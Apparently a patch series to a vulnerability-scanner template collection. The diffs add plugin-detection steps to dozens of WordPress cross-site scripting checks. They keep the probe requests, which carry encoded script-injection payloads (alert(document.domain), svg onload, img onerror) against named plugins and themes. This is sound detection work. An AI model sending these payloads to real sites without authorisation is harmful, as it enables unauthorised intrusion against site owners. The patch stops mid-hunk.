wordpress tags: cve,cve2020,wordpress,xss,wp-plugin,packetstorm,myeventon +flow: http(1) && http(2) + http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/eventON/' + - method: GET path: - '{{BaseURL}}/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E' diff --git a/http/cves/2020/CVE-2020-36510.yaml b/http/cves/2020/CVE-2020-36510.yaml index a2978f95941..b70d824041b 100644 --- a/http/cves/2020/CVE-2020-36510.yaml +++ b/http/cves/2020/CVE-2020-36510.yaml @@ -30,7 +30,20 @@ info: framework: wordpress tags: cve2020,cve,xss,wordpress,wp-theme,wp,wpscan,codetipi +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/themes/15zine/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '/wp-content/themes/15zine/assets/' + - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2020/CVE-2020-7107.yaml b/http/cves/2020/CVE-2020-7107.yaml index 5db9fe406c7..7bcf78f2f5f 100644 --- a/http/cves/2020/CVE-2020-7107.yaml +++ b/http/cves/2020/CVE-2020-7107.yaml @@ -31,7 +31,22 @@ info: framework: wordpress tags: cve,cve2020,ultimate-faqs,wpscan,xss,wordpress,wp-plugin,wp,etoilewebdesign +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/ultimate-faqs/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Ultimate FAQ' + - 'Tags:' + condition: and + - method: GET path: - "{{BaseURL}}/?Display_FAQ=%3C/script%3E%3Csvg/onload=alert(document.cookie)%3E" diff --git a/http/cves/2021/CVE-2021-24214.yaml b/http/cves/2021/CVE-2021-24214.yaml index 99a2d6f8f55..d7aa9970265 100644 --- a/http/cves/2021/CVE-2021-24214.yaml +++ b/http/cves/2021/CVE-2021-24214.yaml @@ -31,7 +31,20 @@ info: framework: wordpress tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,wp,openid,daggerhartlab +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/daggerhart-openid-connect-generic/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'OpenID Connect Generic Client' + - method: GET path: - '{{BaseURL}}/wp-login.php?login-error=' diff --git a/http/cves/2021/CVE-2021-24239.yaml b/http/cves/2021/CVE-2021-24239.yaml index 6139fdf3922..a0036efe60a 100644 --- a/http/cves/2021/CVE-2021-24239.yaml +++ b/http/cves/2021/CVE-2021-24239.yaml @@ -29,7 +29,22 @@ info: framework: wordpress tags: cve2021,cve,xss,pie-register,wp,wpscan,genetechsolutions,wordpress +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Pie Register' + - 'Tags:' + condition: and + - method: GET path: - "{{BaseURL}}/wp-admin/admin.php?page=pr_new_registration_form&show_dash_widget=1&invitaion_code=PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOzwvc2NyaXB0Pg==" diff --git a/http/cves/2021/CVE-2021-24245.yaml b/http/cves/2021/CVE-2021-24245.yaml index 3e65c3f10a9..caed3b277cb 100644 --- a/http/cves/2021/CVE-2021-24245.yaml +++ b/http/cves/2021/CVE-2021-24245.yaml @@ -30,7 +30,22 @@ info: framework: wordpress tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,packetstorm,trumani +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/stop-spammer-registrations-plugin/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Stop Spammers Spam Prevention' + - 'Tags:' + condition: and + - raw: - | POST /wp-login.php HTTP/1.1 diff --git a/http/cves/2021/CVE-2021-24298.yaml b/http/cves/2021/CVE-2021-24298.yaml index 2398a39224c..bae76bc5e61 100644 --- a/http/cves/2021/CVE-2021-24298.yaml +++ b/http/cves/2021/CVE-2021-24298.yaml @@ -31,7 +31,20 @@ info: framework: wordpress tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,ibenic +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/giveasap/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '= Simple Giveaways' + - method: GET path: - '{{BaseURL}}/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2021/CVE-2021-24320.yaml b/http/cves/2021/CVE-2021-24320.yaml index e7c875a97a8..3de31d351ca 100644 --- a/http/cves/2021/CVE-2021-24320.yaml +++ b/http/cves/2021/CVE-2021-24320.yaml @@ -30,7 +30,23 @@ info: framework: wordpress tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,bold-themes +flow: http(1) && http(2) + http: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/wp-content/themes/bello/readme.txt' + + stop-at-first-match: true + matchers: + - type: word + internal: true + words: + - 'wp-content/themes/bello/fonts' + - 'bold-themes.com/bello' + condition: or + - method: GET path: - '{{BaseURL}}/listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2021/CVE-2021-24335.yaml b/http/cves/2021/CVE-2021-24335.yaml index 83d91d2c74a..dc97a22d008 100644 --- a/http/cves/2021/CVE-2021-24335.yaml +++ b/http/cves/2021/CVE-2021-24335.yaml @@ -30,7 +30,22 @@ info: framework: wordpress tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,smartdatasoft +flow: http(1) && http(2) + http: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + internal: true + words: + - '/wp-content/themes/car-repair-services/css' + - '/wp-content/themes/car-repair-services/js' + - 'id="car-repair-services-' + condition: or + - method: GET path: - '{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2021/CVE-2021-24342.yaml b/http/cves/2021/CVE-2021-24342.yaml index 1fcfa36d490..cd31f1fb367 100644 --- a/http/cves/2021/CVE-2021-24342.yaml +++ b/http/cves/2021/CVE-2021-24342.yaml @@ -29,7 +29,22 @@ info: framework: wordpress tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,jnews +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/themes/jnews/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Change Log:' + - 'JNews -' + condition: and + - raw: - | POST /?ajax-request=jnews HTTP/1.1 diff --git a/http/cves/2021/CVE-2021-24364.yaml b/http/cves/2021/CVE-2021-24364.yaml index b9aeb55cd1b..56a867008a4 100644 --- a/http/cves/2021/CVE-2021-24364.yaml +++ b/http/cves/2021/CVE-2021-24364.yaml @@ -30,7 +30,22 @@ info: framework: wordpress tags: cve2021,cve,wordpress,xss,wp-theme,wpscan,tielabs +flow: http(1) && http(2) + http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '/wp-content/themes/jannah/assets/' + - 'attachment-jannah-image-' + condition: or + - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D' diff --git a/http/cves/2021/CVE-2021-24387.yaml b/http/cves/2021/CVE-2021-24387.yaml index b4e94057eaa..adfa0769fff 100644 --- a/http/cves/2021/CVE-2021-24387.yaml +++ b/http/cves/2021/CVE-2021-24387.yaml @@ -36,9 +36,6 @@ http: - | GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 - Connection: close matchers-condition: and matchers: diff --git a/http/cves/2021/CVE-2021-24407.yaml b/http/cves/2021/CVE-2021-24407.yaml index c91e2938d58..df03780015b 100644 --- a/http/cves/2021/CVE-2021-24407.yaml +++ b/http/cves/2021/CVE-2021-24407.yaml @@ -29,13 +29,26 @@ info: framework: wordpress tags: cve2021,cve,wordpress,xss,wp-theme,wpscan,tielabs +flow: http(1) && http(2) + http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '/wp-content/themes/jannah/assets/' + - 'attachment-jannah-image-' + condition: or + - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} - Accept: */* - Content-Type: application/x-www-form-urlencoded action=tie_ajax_search&query[]= diff --git a/http/cves/2021/CVE-2021-24495.yaml b/http/cves/2021/CVE-2021-24495.yaml index e069f58f6ff..e1da5cf1394 100644 --- a/http/cves/2021/CVE-2021-24495.yaml +++ b/http/cves/2021/CVE-2021-24495.yaml @@ -49,6 +49,11 @@ http: words: - Marmoset Viewer + - type: word + part: header + words: + - text/html + - type: status status: - 200 diff --git a/http/cves/2021/CVE-2021-24891.yaml b/http/cves/2021/CVE-2021-24891.yaml index d739a52f93c..eb358e99182 100644 --- a/http/cves/2021/CVE-2021-24891.yaml +++ b/http/cves/2021/CVE-2021-24891.yaml @@ -29,7 +29,20 @@ info: framework: wordpress tags: cve2021,cve,wordpress,wp-plugin,elementor,wpscan,dom,xss +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/elementor/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Elementor Website Builder' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/elementor/assets/js/frontend.min.js" diff --git a/http/cves/2022/CVE-2022-0381.yaml b/http/cves/2022/CVE-2022-0381.yaml index 1e407e664c4..ca4ba342f66 100644 --- a/http/cves/2022/CVE-2022-0381.yaml +++ b/http/cves/2022/CVE-2022-0381.yaml @@ -31,7 +31,22 @@ info: framework: wordpress tags: cve,cve2022,swagger,xss,wordpress,embed_swagger_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/embed-swagger/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Embed Swagger' + - 'Tags:' + condition: and + - method: GET path: - "{{BaseURL}}/wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22" diff --git a/http/cves/2022/CVE-2022-1724.yaml b/http/cves/2022/CVE-2022-1724.yaml index 7037c42af5e..ce61bdccddc 100644 --- a/http/cves/2022/CVE-2022-1724.yaml +++ b/http/cves/2022/CVE-2022-1724.yaml @@ -31,7 +31,22 @@ info: framework: wordpress tags: cve,cve2022,xss,wp,wordpress,wpscan,wp-plugin,simple-membership-plugin +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/simple-membership/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Simple Membership' + - 'Tags:' + condition: and + - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=swpm_validate_email&fieldId=%22%3Cscript%3Ealert(document.domain)%3C/script%3E' diff --git a/http/cves/2022/CVE-2022-2383.yaml b/http/cves/2022/CVE-2022-2383.yaml index d651649e85a..99e67b0ed6a 100644 --- a/http/cves/2022/CVE-2022-2383.yaml +++ b/http/cves/2022/CVE-2022-2383.yaml @@ -30,7 +30,22 @@ info: framework: wordpress tags: cve,cve2022,wp,wordpress,wp-plugin,wpscan,xss,slickremix +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/feed-them-social/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Feed Them Social' + - 'Tags:' + condition: and + - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E' diff --git a/http/cves/2022/CVE-2022-2462.yaml b/http/cves/2022/CVE-2022-2462.yaml index 48a84943cc2..7da7da7322d 100644 --- a/http/cves/2022/CVE-2022-2462.yaml +++ b/http/cves/2022/CVE-2022-2462.yaml @@ -29,7 +29,7 @@ info: vendor: transposh product: transposh_wordpress_translation framework: wordpress - tags: cve,cve2022,wordpress,disclosure,wp-plugin,packetstorm,transposh,xss + tags: cve,cve2022,wordpress,disclosure,wp-plugin,packetstorm,transposh http: - method: POST diff --git a/http/cves/2023/CVE-2023-0602.yaml b/http/cves/2023/CVE-2023-0602.yaml index b9a9ec3313c..4e5113822c8 100644 --- a/http/cves/2023/CVE-2023-0602.yaml +++ b/http/cves/2023/CVE-2023-0602.yaml @@ -43,6 +43,6 @@ http: dsl: - 'status_code_2 == 200' - 'contains(header_2, "text/html")' - - 'contains(body_2, "") && contains(body_2, "twittee")' + - 'contains_all(body_2, "", "twittee")' condition: and # digest: 4a0a0047304502201516cf14498ef8587ad8764d885bb6e89fa7ad440961d8bdc6242a1b60606ebf022100958b5718c780c80c3c5b796cbe6e1eedc4529e1b2bf6e7cd885d3848a121e258:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/wordpress/ldap-wp-login-xss.yaml b/http/vulnerabilities/wordpress/ldap-wp-login-xss.yaml index a2a3b1a3a57..4cbe370dfe8 100644 --- a/http/vulnerabilities/wordpress/ldap-wp-login-xss.yaml +++ b/http/vulnerabilities/wordpress/ldap-wp-login-xss.yaml @@ -31,7 +31,7 @@ http: dsl: - 'status_code_2 == 200' - 'contains(header_2, "text/html")' - - 'contains(body_2, "") && contains(body_2, "LDAP-authentication-intergrating-with-AD")' + - 'contains_all(body_2, "", "LDAP-authentication-intergrating-with-AD")' condition: and # digest: 4a0a0047304502200bce04c8d9eabc4702c702560e2457a66aad41c2d00028f8eaf7ae2a87237f42022100994299926a74ebd78085b7ada4602df0bf228769319370793ad5f76739c2b7a9:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml b/http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml index 5e9faea1da0..a79a4642d8e 100644 --- a/http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml +++ b/http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml @@ -13,7 +13,20 @@ info: max-request: 1 tags: wordpress,wp-plugin,xss,wordfence +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/wordfence/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Wordfence Security - ' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E" diff --git a/http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml b/http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml index 55d8de29c41..e84ccad08ca 100644 --- a/http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml +++ b/http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml @@ -17,7 +17,22 @@ info: max-request: 1 tags: wordpress,xss,wp,wpscan,intrusive +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/wp-ticket/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'WP Ticket' + - 'Tags:' + condition: and + - raw: - | POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(document.domain)%3E&control=upload HTTP/1.1 diff --git a/http/vulnerabilities/wordpress/wp-ambience-xss.yaml b/http/vulnerabilities/wordpress/wp-ambience-xss.yaml index 39cb2fdd1c2..885a84b69dc 100644 --- a/http/vulnerabilities/wordpress/wp-ambience-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-ambience-xss.yaml @@ -17,7 +17,19 @@ info: max-request: 1 tags: wp-plugin,wp,edb,wpscan,wordpress,xss +flow: http(1) && http(2) + http: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + internal: true + words: + - '/wp-content/themes/ambience/' + - method: GET path: - '{{BaseURL}}/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg' diff --git a/http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml b/http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml index e34fb8eda87..756fcb4cf48 100644 --- a/http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml @@ -16,7 +16,22 @@ info: max-request: 1 tags: wpscan,wordpress,xss,wp-plugin +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/custom-tables/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'custom tables' + - 'Tags:' + condition: and + - method: GET path: - '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/vulnerabilities/wordpress/wp-finder-xss.yaml b/http/vulnerabilities/wordpress/wp-finder-xss.yaml index 83725e6f8f6..e8d3b0b8f68 100644 --- a/http/vulnerabilities/wordpress/wp-finder-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-finder-xss.yaml @@ -15,7 +15,20 @@ info: max-request: 1 tags: xss,wp-plugin,packetstorm,wordpress +flow: http(1) && http(2) + http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/finder/' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/vulnerabilities/wordpress/wp-flagem-xss.yaml b/http/vulnerabilities/wordpress/wp-flagem-xss.yaml index 45c9c331cb3..5010af8e3a7 100644 --- a/http/vulnerabilities/wordpress/wp-flagem-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-flagem-xss.yaml @@ -16,7 +16,20 @@ info: max-request: 1 tags: wordpress,xss,wp-plugin,edb +flow: http(1) && http(2) + http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/FlagEm/' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/vulnerabilities/wordpress/wp-knews-xss.yaml b/http/vulnerabilities/wordpress/wp-knews-xss.yaml index 4a62cdfd0c1..d86ffb25f6b 100644 --- a/http/vulnerabilities/wordpress/wp-knews-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-knews-xss.yaml @@ -16,7 +16,20 @@ info: max-request: 1 tags: wordpress,xss,wp-plugin +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/knews/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Knews Multilingual Newsletters' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/vulnerabilities/wordpress/wp-nextgen-xss.yaml b/http/vulnerabilities/wordpress/wp-nextgen-xss.yaml index e1d4f593b8c..070c1df06f2 100644 --- a/http/vulnerabilities/wordpress/wp-nextgen-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-nextgen-xss.yaml @@ -16,7 +16,20 @@ info: max-request: 1 tags: wp-plugin,edb,wordpress,xss +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/nextgen-gallery/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '= NextGEN Gallery' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml b/http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml index 418cf0f5022..d6e306075b7 100644 --- a/http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml @@ -16,7 +16,20 @@ info: max-request: 1 tags: xss,wp-plugin,edb,wordpress +flow: http(1) && http(2) + http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/phpfreechat/' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/vulnerabilities/wordpress/wp-qwiz-online-xss.yaml b/http/vulnerabilities/wordpress/wp-qwiz-online-xss.yaml index 8a8c6d7fa61..32f3d8d3446 100644 --- a/http/vulnerabilities/wordpress/wp-qwiz-online-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-qwiz-online-xss.yaml @@ -27,6 +27,6 @@ http: - type: dsl dsl: - 'status_code == 200' - - 'contains(body, "quizzes/flashcard") && contains(body, "")' + - 'contains_all(body, "quizzes/flashcard", "")' condition: and # digest: 4b0a00483046022100ff6532c28c9d55c99ce1d16ffe5bd1ccc69be841bb9bff96e34628badc05181f022100e31126ad944fb55cbb6c015690aedae7ab4a204aa181b1b921ab2fe73430be71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/wordpress/wp-securimage-xss.yaml b/http/vulnerabilities/wordpress/wp-securimage-xss.yaml index 297fab34a95..a87e92d8851 100644 --- a/http/vulnerabilities/wordpress/wp-securimage-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-securimage-xss.yaml @@ -16,7 +16,22 @@ info: max-request: 1 tags: edb,wordpress,xss,wp-plugin +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/securimage-wp/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Securimage-WP' + - 'Tags:' + condition: and + - method: GET path: - '{{BaseURL}}/wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1' diff --git a/http/vulnerabilities/wordpress/wp-slideshow-xss.yaml b/http/vulnerabilities/wordpress/wp-slideshow-xss.yaml index 51932fe2a8b..0af4373ee58 100644 --- a/http/vulnerabilities/wordpress/wp-slideshow-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-slideshow-xss.yaml @@ -15,7 +15,22 @@ info: max-request: 1 tags: wordpress,xss,wp-plugin,edb +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/slideshow-jquery-image-gallery/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Slideshow' + - 'Stable tag:' + condition: and + - method: GET path: - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' From 4e7b652b3b485de5fee9a5b0470b0bd934ed6c00 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha Date: Tue, 26 Mar 2024 23:09:50 +0530 Subject: [PATCH 4/7] plugin-flow (xss) --- http/cves/2011/CVE-2011-5107.yaml | 12 ++++++++++++ http/cves/2012/CVE-2012-0901.yaml | 12 ++++++++++++ http/cves/2014/CVE-2014-4535.yaml | 14 +++++++++++++- http/cves/2014/CVE-2014-4550.yaml | 12 ++++++++++++ http/cves/2014/CVE-2014-4558.yaml | 12 ++++++++++++ http/cves/2016/CVE-2016-1000136.yaml | 12 ++++++++++++ http/cves/2016/CVE-2016-1000139.yaml | 16 ++++++++++++++++ http/cves/2017/CVE-2017-17059.yaml | 2 +- 8 files changed, 90 insertions(+), 2 deletions(-) diff --git a/http/cves/2011/CVE-2011-5107.yaml b/http/cves/2011/CVE-2011-5107.yaml index cb86613bfb1..f18d0ad1b03 100644 --- a/http/cves/2011/CVE-2011-5107.yaml +++ b/http/cves/2011/CVE-2011-5107.yaml @@ -29,7 +29,19 @@ info: google-query: inurl:"/wp-content/plugins/alert-before-your-post" tags: cve,cve2011,wordpress,xss,wp-plugin +flow: http(1) && http(2) + http: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/alert-before-your-post/' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml index 333e7a2e921..12cdbba81c0 100644 --- a/http/cves/2012/CVE-2012-0901.yaml +++ b/http/cves/2012/CVE-2012-0901.yaml @@ -29,7 +29,19 @@ info: google-query: inurl:"/wp-content/plugins/yousaytoo-auto-publishing-plugin" tags: cve,cve2012,wp-plugin,packetstorm,wordpress,xss,attenzione +flow: http(1) && http(2) + http: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/yousaytoo-auto-publishing-plugin/' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2014/CVE-2014-4535.yaml b/http/cves/2014/CVE-2014-4535.yaml index dd3961ff471..f90f57579f6 100644 --- a/http/cves/2014/CVE-2014-4535.yaml +++ b/http/cves/2014/CVE-2014-4535.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-4535 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.47838 + epss-percentile: 0.48664 cpe: cpe:2.3:a:import_legacy_media_project:import_legacy_media:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -29,7 +29,19 @@ info: framework: wordpress tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,import_legacy_media_project +flow: http(1) && http(2) + http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/import-legacy-media/' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2014/CVE-2014-4550.yaml b/http/cves/2014/CVE-2014-4550.yaml index 8271baf284c..039fcd19ee9 100644 --- a/http/cves/2014/CVE-2014-4550.yaml +++ b/http/cves/2014/CVE-2014-4550.yaml @@ -29,7 +29,19 @@ info: google-query: inurl:"/wp-content/plugins/shortcode-ninja" tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,visualshortcodes +flow: http(1) && http(2) + http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/shortcode-ninja/' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e" diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml index 31b6c4637a6..047d2dd3879 100644 --- a/http/cves/2014/CVE-2014-4558.yaml +++ b/http/cves/2014/CVE-2014-4558.yaml @@ -28,7 +28,19 @@ info: framework: wordpress tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,woocommerce,unauth,cybercompany +flow: http(1) && http(2) + http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/swipehq-payment-gateway-woocommerce/' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E " diff --git a/http/cves/2016/CVE-2016-1000136.yaml b/http/cves/2016/CVE-2016-1000136.yaml index 6283fea6a5c..90af3597e7f 100644 --- a/http/cves/2016/CVE-2016-1000136.yaml +++ b/http/cves/2016/CVE-2016-1000136.yaml @@ -27,7 +27,19 @@ info: google-query: inurl:"/wp-content/plugins/heat-trackr" tags: cve2016,cve,wordpress,xss,wp-plugin,heat-trackr_project +flow: http(1) && http(2) + http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/heat-trackr/' + - method: GET path: - 